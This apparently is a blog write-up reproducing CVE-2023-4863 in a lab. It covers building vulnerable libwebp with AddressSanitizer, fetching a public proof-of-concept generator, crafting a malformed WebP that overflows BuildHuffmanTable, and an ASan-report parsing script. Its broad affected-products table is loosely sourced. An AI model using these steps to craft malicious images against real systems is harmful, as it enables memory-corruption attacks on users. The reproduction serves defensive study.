# Heap Buffer Overflow in libwebp in Google Chrome - CVE-2023-4863

<figure><img src="https://2451201392-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSXlq8GYyAbVnvbRZogU3%2Fuploads%2FWMcNWmVJpTDf0kDW5gwX%2Fimage.png?alt=media&#x26;token=185069ef-1a77-4480-9954-ac962607ce0f" alt="" width="563"><figcaption><p><em>Image Source:</em> <a href="https://www.helpnetsecurity.com/2023/09/12/cve-2023-4863/"><em>https://www.helpnetsecurity.com/2023/09/12/cve-2023-4863/</em></a></p></figcaption></figure>

{% hint style="warning" %}
Use what I'm about to say in this article only for the right purposes, such as raising security awareness and improving the security posture of your environments. I do not accept any responsibility for other uses.
{% endhint %}

*WebP is an open-source image format developed by Google. WebP enables higher quality images in smaller file sizes. The libwebp package, released by Google, encodes and decodes images in WebP format and is used widely across the internet for lossless image compression.*

*The image parsing library libwebp is the core of the recently identified* [*CVE-2023-4863*](https://nvd.nist.gov/vuln/detail/CVE-2023-4863) *heap buffer overflow vulnerability and zero-day exploit that <mark style="color:yellow;">**impacts Google Chrome and other Chromium-based browsers for Windows, macOS, and Linux, as well as any software or web application that uses the libwebp library.**</mark> (Source:*[*https://www.upguard.com/blog/libwebp-cve-2023*](https://www.upguard.com/blog/libwebp-cve-2023)*)*

<figure><img src="https://2451201392-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSXlq8GYyAbVnvbRZogU3%2Fuploads%2FMPZKOnRgE4wjAjg63jm6%2Fimage.png?alt=media&#x26;token=3f8cd607-ccb1-4cd2-a2c8-30557083d9ef" alt="" width="563"><figcaption><p><em>Image Source:</em> <a href="https://www.oligo.security/blog/critical-vulnerability-in-webp-libwebp-cve-2023-4863"><em>https://www.oligo.security/blog/critical-vulnerability-in-webp-libwebp-cve-2023-4863</em></a></p></figcaption></figure>

*<mark style="color:yellow;">**Google Chrome versions before 116.0.5845.187**</mark>* and *<mark style="color:yellow;">**libwebp versions before 1.3.2**</mark>* are affected by this vulnerability. Chromium's security severity rating is Critical.

Because so many applications use the libwebp library, a large number of them are affected by this vulnerability; the *<mark style="color:yellow;">**CVSS score is 8.8**</mark>*. Here are some applications that may be affected.

| **Category**         | **Products**                                                                                                                              |
| -------------------- | ----------------------------------------------------------------------------------------------------------------------------------------- |
| **Web Browsers**     | Google Chrome, Safari, Microsoft Edge, Mozilla Firefox, Tor, Beaker (web browser), GNOME Web, Midori, OhHai Browser, Pale Moon, SEOBrowse |
| **Social Media**     | Discord, Facebook, Instagram, LinkedIn, Pinterest, Reddit, Telegram, Twitter, WhatsApp                                                   |
| **Video Platforms**  | Lbry, Twitch, Vimeo, YouTube, YTMDesktop App                                                                                              |
| **Cloud Storage**    | Amazon Photos, Dropbox, Google Drive, Google Photos                                                                                       |
| **Ecommerce**        | Amazon, Ebay, Etsy, Shopify, WooCommerce                                                                                                  |
| **CMS**              | Drupal, Joomla, MediaWiki, WordPress                                                                                                      |
| **Email Services**   | Gmail                                                                                                                                     |
| **Forum Software**   | PHPBB, vBulletin, XenForo                                                                                                                 |
| **Photo Editing**    | GDAL, GIMP, Graphic Converter, ImageMagick, Paint.NET, Photoshop, Photoshop and Picasa, Pixelmator, XnView                                |
| **Game Engines**     | Godot Engine, Unreal Engine, Unity                                                                                                        |
| **Desktop Software** | 1Password, Basecamp 3, Bitwarden, Blender, Cryptocat (discontinued), Discord, Discord RPC Maker, Electron App Store (Unofficial), Etcher  |
| **Web Servers**      | Apache, IIS, nginx                                                                                                                        |
| **Major Companies**  | Facebook, Google, Slack, Wikimedia, WordPress.com                                                                                         |

*(List source:* [*https://www.cyberkendra.com/2023/09/webp-0day-google-assign-new-cve-for.html*](https://www.cyberkendra.com/2023/09/webp-0day-google-assign-new-cve-for.html)*)*

Now let's reproduce the vulnerability with a proof of concept (PoC).

First, clone the libwebp source from Google's repository.

```bash
git clone https://chromium.googlesource.com/webm/libwebp/ webp_test
```

<figure><img src="https://2451201392-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSXlq8GYyAbVnvbRZogU3%2Fuploads%2F2LPDFpwFa9KGkjgtWbTw%2Fimage.png?alt=media&#x26;token=746b6d67-cab6-4020-b2f1-592bb756a373" alt=""><figcaption></figcaption></figure>

Let's go to the *<mark style="color:yellow;">**webp\_test**</mark>* folder.

```bash
cd webp_test
```

Then check out the relevant (pre-fix) commit.

```bash
git checkout 7ba44f80f3b94fc0138db159afea770ef06532a0
```

<figure><img src="https://2451201392-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSXlq8GYyAbVnvbRZogU3%2Fuploads%2Fj8DxGrIT1BX76yj2G72h%2Fimage.png?alt=media&#x26;token=f68dbe7e-23ab-4fb2-a0f9-81df5568fce8" alt=""><figcaption></figcaption></figure>

***Let's enable AddressSanitizer (ASan)***. This compiler instrumentation detects memory errors such as heap and stack buffer overflows and use-after-free in C and C++ programs at run time.

```bash
sed -i 's/^EXTRA_FLAGS=.*/& -fsanitize=address/' makefile.unix
```

Build the library and the example tools using *<mark style="color:yellow;">**makefile.unix**</mark>*.

```bash
make -f makefile.unix
```

At this point you may see errors about missing header files. Below are the errors I hit and the packages that resolve them.

<figure><img src="https://2451201392-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSXlq8GYyAbVnvbRZogU3%2Fuploads%2F18AIloEnQCYQtgbOqj53%2Fimage.png?alt=media&#x26;token=61a9b941-3add-463a-bbf3-02affcc7461e" alt=""><figcaption></figcaption></figure>

Let's install *<mark style="color:yellow;">**libjpeg-dev**</mark>*.

```bash
sudo apt-get install libjpeg-dev
```

Then install *<mark style="color:yellow;">**libpng-dev**</mark>*.

```bash
sudo apt-get install libpng-dev
```

Install *<mark style="color:yellow;">**libtiff-dev**</mark>*.

```bash
sudo apt-get install libtiff-dev
```

Then run the build with *<mark style="color:yellow;">**makefile.unix**</mark>* again.

```bash
make -f makefile.unix
```

<figure><img src="https://2451201392-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSXlq8GYyAbVnvbRZogU3%2Fuploads%2FHKtehNGpUXURLrdD8Y9D%2Fimage.png?alt=media&#x26;token=71a14321-7f57-4e4c-b071-b26ce95f1923" alt=""><figcaption></figcaption></figure>

Then, go to the *<mark style="color:yellow;">**examples**</mark>* folder.

```bash
cd examples/
```

Let's download the C source code named *<mark style="color:yellow;">**craft.c**</mark>*.

```bash
wget https://raw.githubusercontent.com/mistymntncop/CVE-2023-4863/main/craft.c
```

<figure><img src="https://2451201392-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSXlq8GYyAbVnvbRZogU3%2Fuploads%2F7dSUiWAkc5j0FD0aCAT2%2Fimage.png?alt=media&#x26;token=b200427f-24c1-4f67-8c78-6554d0850425" alt=""><figcaption></figcaption></figure>

Compile the C source file craft.c; the result is an executable named *<mark style="color:yellow;">**craft**</mark>*.

```bash
gcc -o craft craft.c
```

Run craft with bad.webp as its file argument.

```bash
./craft bad.webp
```

Then run the final command: decode bad.webp with the ASan-instrumented dwebp.

```bash
./dwebp bad.webp -o test.png
```

The heap buffer overflow is triggered at exactly this stage.

<figure><img src="https://2451201392-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSXlq8GYyAbVnvbRZogU3%2Fuploads%2FwEHTeYrNoPnFHVhqSRqo%2Fimage.png?alt=media&#x26;token=00979e6c-a996-4752-9ebb-479489fd2ee3" alt=""><figcaption></figcaption></figure>

The output shows that the dwebp program encountered a heap buffer overflow: the program tried to write data to a heap location outside the buffer it was allowed to access. AddressSanitizer (ASan) worked as expected and reported the heap buffer overflow. ***The error occurs in the*** *<mark style="color:yellow;">**BuildHuffmanTable**</mark>* ***function, which is part of the WebP library.***

As the error description shows, the fault occurs at memory address 0x626000002f28.

```
==78508==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x626000002f28 at pc 0x5589e8fad35a bp 0x7fff95d4c400 sp 0x7fff95d4c3f0
```

The frame below names the function that triggered the error, namely *<mark style="color:yellow;">**BuildHuffmanTable**</mark>*.

```
#0 0x5589e8fad359 in BuildHuffmanTable (/home/ali/webp_test/examples/dwebp+0xb6359)
```

AddressSanitizer relies on shadow memory for this detection. Every 8 bytes of application memory map to one shadow byte that records how many of those 8 bytes are addressable: 00 means all eight, 01 to 07 means only the first that many, and values such as fa mark the redzones ASan places around each heap allocation. When an access lands on memory whose shadow byte says it is not addressable, ASan reports it and prints the shadow bytes around the faulting address. In the dump below, the bracketed fa on the marked line is the shadow byte for 0x626000002f28: the bytes before it are 00 (the end of the allocated buffer) and it is the first byte of the redzone that follows, so the write landed exactly past the end of the allocation.

```
Shadow bytes around the buggy address:
  0x0c4c7fff8590: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4c7fff85a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4c7fff85b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4c7fff85c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4c7fff85d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c4c7fff85e0: 00 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa
  0x0c4c7fff85f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4c7fff8600: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4c7fff8610: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4c7fff8620: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4c7fff8630: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
```
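The three pieces of the report discussed above (the ERROR line, frame #0 and the shadow dump) can be pulled apart automatically. The triage helper below is an added example, not part of the original article or of libwebp: it re-parses the lines shown above, computes the shadow address the way ASan does on x86-64 (shadow = (addr >> 3) + 0x7fff8000) and decodes what the bracketed shadow byte says about the faulting write. The sample report and the legend subset are constructed from the output shown in this article.

```python
"""Triage helper for an AddressSanitizer (ASan) heap-buffer-overflow report."""
import re
SHADOW_OFFSET = 0x7FFF8000  # default x86-64 mapping: shadow = (addr >> 3) + offset
SHADOW_LEGEND = {  # subset of the legend ASan prints under every report
    0x00: "Addressable", 0xFA: "Heap left redzone", 0xFD: "Freed heap region",
    0xF1: "Stack left redzone", 0xF3: "Stack right redzone", 0xF8: "Stack after return",
}
# Constructed sample: the report lines shown in the article, trimmed to what gets parsed.
SAMPLE_REPORT = """\
==78508==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x626000002f28 at pc 0x5589e8fad35a bp 0x7fff95d4c400 sp 0x7fff95d4c3f0
    #0 0x5589e8fad359 in BuildHuffmanTable (/home/ali/webp_test/examples/dwebp+0xb6359)
Shadow bytes around the buggy address:
  0x0c4c7fff85d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c4c7fff85e0: 00 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa
  0x0c4c7fff85f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
"""

def parse_shadow_dump(report):
    """Map shadow address -> shadow byte value for every line of the shadow dump."""
    shadow = {}
    for m in re.finditer(r"^(?:=>|\s*)\s*0x([0-9a-f]+):(.*)$", report, re.M):
        base = int(m.group(1), 16)
        for i, val in enumerate(re.findall(r"\[?([0-9a-f]{2})\]?", m.group(2))):
            shadow[base + i] = int(val, 16)
    return shadow

def describe_shadow(byte):
    if 1 <= byte <= 7:
        return f"Partially addressable ({byte} of 8 bytes)"
    return SHADOW_LEGEND.get(byte, f"Unknown shadow value {byte:#04x}")

def triage(report):
    """Extract error kind, faulting address, top frame and what the shadow byte says about it."""
    err = re.search(r"AddressSanitizer: (\S+) on address 0x([0-9a-f]+)", report)
    frame = re.search(r"#0 0x[0-9a-f]+ in (\S+)", report)
    addr = int(err.group(2), 16)
    shadow = parse_shadow_dump(report)
    saddr = (addr >> 3) + SHADOW_OFFSET
    # The shadow byte just before the fault says where valid memory ended: 00 means its
    # whole 8-byte granule was addressable, 01..07 means only that many leading bytes.
    prev, granule = shadow.get(saddr - 1), addr & ~7
    region_end = None if prev is None or prev > 7 else granule - 8 + (prev or 8)
    return {"kind": err.group(1), "address": addr, "function": frame.group(1),
            "shadow_address": saddr, "shadow_byte": shadow[saddr],
            "meaning": describe_shadow(shadow[saddr]),
            "bytes_past_end": None if region_end is None else addr - region_end}

if __name__ == "__main__":
    print(triage(SAMPLE_REPORT))
```

For the report above this yields a shadow address of 0x0c4c7fff85e5, the heap-left-redzone byte, and a distance of 0 bytes past the end of the allocation.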

### Sources

- <https://github.com/bbaranoff/CVE-2023-4863>
- <https://github.com/mistymntncop/CVE-2023-4863/blob/main/bad.webp>
- <https://www.upguard.com/blog/libwebp-cve-2023>
- <https://www.cyberkendra.com/2023/09/webp-0day-google-assign-new-cve-for.html>
